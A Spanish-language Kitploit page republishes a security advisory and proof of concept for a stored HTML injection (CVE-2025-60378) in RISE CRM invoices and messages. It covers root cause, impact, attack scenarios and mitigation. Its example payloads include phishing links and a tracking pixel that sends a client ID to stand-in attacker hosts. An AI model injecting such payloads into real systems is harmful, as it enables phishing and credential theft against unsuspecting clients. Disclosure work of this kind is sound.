¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!
CVE-2025-60378 — Prueba de concepto para la inyección de HTML almacenada en RISE CRM, que demuestra cómo los usuarios autenticados pueden inyectar HTML malicioso en facturas y mensajes, lo que conduce a phishing y distribución de malware a través de correos electrónicos y PDFs automatizados. | Kitploit
Prueba de concepto para la inyección de HTML almacenada en RISE CRM, que demuestra cómo los usuarios autenticados pueden inyectar HTML malicioso en facturas y mensajes, lo que conduce a phishing y distribución de malware a través de correos electrónicos y PDFs automatizados.
CVE-2025-60378: Inyección de HTML Almacenado en RISE Ultimate Project Manager & CRM
⚠️ Aviso de Seguridad
Una vulnerabilidad crítica de inyección de HTML almacenado que afecta a facturas, mensajería y comunicaciones automatizadas
📋 Resumen
Se ha descubierto una vulnerabilidad crítica de inyección de HTML almacenado en RISE Ultimate Project Manager & CRM que permite a usuarios autenticados inyectar HTML malicioso en partidas de facturas, notas de clientes y módulos de mensajería. Este contenido inyectado persiste en la base de datos y se renderiza automáticamente en correos electrónicos dirigidos a clientes, PDFs y comunicaciones de chat, lo que permite ataques de phishing a gran escala, compromiso de correo empresarial y entrega de malware mediante correo electrónico/PDF.
RISE CRM no sanea ni codifica adecuadamente el contenido HTML en múltiples campos editables por el usuario, incluyendo facturas, mensajes y notas de clientes. Cuando usuarios autenticados inyectan cargas útiles HTML en estos campos, el contenido se almacena en la base de datos sin un filtrado adecuado. Posteriormente, este HTML malicioso se renderiza automáticamente en correos electrónicos dirigidos a clientes, archivos PDF adjuntos y módulos de mensajería/chat sin el escape adecuado. Las facturas recurrentes y la mensajería automatizada amplifican el ataque al distribuir contenido malicioso a múltiples destinatarios simultáneamente.
Componentes Afectados
✗ Partidas de facturas (campo de descripción)
✗ Módulo de notas/mensajería de clientes
✗ Sistema de chat y mensajería
✗ Módulo de generación de estados de cuenta de clientes
✗ Sistema de correo electrónico automatizado (facturas recurrentes, recordatorios)
✗ Archivos PDF adjuntos
Causa Raíz
❌ Saneamiento insuficiente de entradas en campos de facturas, mensajes y notas de clientes
❌ Falta de codificación de salida HTML en plantillas de correo electrónico y generación de PDF
❌ Sin validación de contenido antes de almacenar en la base de datos
❌ Falta de restricciones sobre HTML/JavaScript en comunicaciones con clientes
❌ Los sistemas automatizados distribuyen contenido no validado sin filtrado adicional
💥 Impacto
Implicaciones de Seguridad
🎣 Phishing a Gran Escala: El contenido inyectado puede suplantar comunicaciones legítimas y redirigir a múltiples clientes a sitios controlados por el atacante
💼 Compromiso de Correo Empresarial: Facturas y mensajes maliciosos enviados a clientes parecen provenir de una fuente confiable
💬 Mensajería Comprometida: Las cargas útiles maliciosas en chat/mensajería llegan directamente a miembros del equipo y clientes
🦠 Distribución de Malware: Enlaces maliciosos incrustados o iframes entregan malware mediante correo electrónico/PDF/mensajería
🔄 Distribución Automatizada de Ataques: Las facturas recurrentes y mensajes automatizados aseguran que la carga útil llegue a múltiples destinatarios sin intervención manual
👥 Ataque Multi-Vector: La combinación de superficies de ataque por correo electrónico, PDF y mensajería aumenta la tasa de compromiso exitoso
Evaluación de la Tríada CIA
Factor
Impacto
Explicación
Confidencialidad
🔴 ALTA
Las credenciales de clientes y datos sensibles pueden ser recolectados mediante phishing
Integridad
🔴 ALTA
El contenido malicioso puede modificar la percepción de las comunicaciones y relaciones comerciales
Disponibilidad
🟡 BAJA
Impacto directo limitado en la disponibilidad del sistema
Escenarios de Ataque en el Mundo Real
Escenario 1: Campaña de Phishing Basada en Facturas
Un atacante con acceso de gerente de proyecto de bajos privilegios crea una factura con HTML malicioso:
root@kitploit:~
<a href="https://attacker.com/fake-payment">Haga clic aquí para ver el estado del pago</a>
La factura se envía a más de 100 clientes mediante correo electrónico automatizado. Todos los clientes reciben lo que parece ser una factura legítima que los dirige a un sitio de phishing. El atacante recolecta credenciales de múltiples víctimas simultáneamente.
Escenario 2: Ataque Basado en Mensajería
Un atacante inyecta HTML malicioso en un mensaje de cliente:
root@kitploit:~
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Descargar Archivos de Proyecto Actualizados</a>
Todos los miembros del equipo y clientes reciben el mensaje en su chat, haciendo clic en enlaces para descargar malware.
Escenario 3: Entrega de Malware mediante Facturas Recurrentes
Un atacante configura una factura recurrente con una carga útil de entrega de malware. Cada mes, los clientes reciben automáticamente facturas con contenido malicioso incrustado, proporcionando un vector de ataque persistente.
🧪 Prueba de Concepto
Configuración del Entorno
Acceso al panel de administración de RISE CRM con permisos de creación de facturas/mensajes
Cualquier versión anterior a 3.9.4
Pasos de la PoC
Paso 1: Acceder a la Creación de Facturas o Mensajes
root@kitploit:~
Navegar a: Panel de RISE CRM → Facturas/Mensajes → Crear Nuevo
Paso 2: Inyectar Carga Útil HTML en el Campo de Descripción/Mensaje
root@kitploit:~
<a href="https://attacker.com">Haga clic aquí para ver la factura</a>
<h1><font color=red>Visite Nuestro Nuevo Sitio Web</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>
Paso 5: Configurar Distribución Recurrente
Guardar el registro
Habilitar la opción "Recurrente" (si está disponible para facturas/mensajes)
Configurar la frecuencia (semanal, mensual, etc.)
El sistema envía automáticamente a todos los clientes relevantes
Paso 6: Verificar el Vector de Ataque
Revisar la bandeja de entrada del correo del cliente
Revisar la mensajería/chat del cliente
Abrir el archivo PDF adjunto
Observar el HTML malicioso renderizado en todos los canales
Resultado Esperado
✅ El HTML inyectado se renderiza en correos electrónicos, PDFs y mensajería sin escape
✅ Los enlaces son clicables y redirigen a sitios del atacante
✅ Las imágenes se cargan desde servidores controlados por el atacante
✅ El contenido persiste en todas las comunicaciones futuras con clientes
✅ La distribución recurrente llega a múltiples destinatarios automáticamente
🛡️ Mitigación
Para Usuarios Finales
✅ Actualizar Inmediatamente: Actualizar a RISE CRM v3.9.4 o posterior
🔍 Auditar Todos los Registros: Revisar facturas, mensajes y notas de clientes recientes en busca de contenido HTML sospechoso
⚠️ Notificación a Clientes: Alertar a todos los clientes si se enviaron facturas o mensajes sospechosos
🔄 Restablecimiento de Credenciales: Recomendar a los clientes cambiar sus contraseñas si hicieron clic en enlaces
📝 Monitorear Actividad: Revisar registros de auditoría en busca de modificaciones no autorizadas de facturas/mensajes
🔐 Deshabilitar Recurrentes: Deshabilitar temporalmente facturas/mensajes recurrentes hasta que se aplique el parche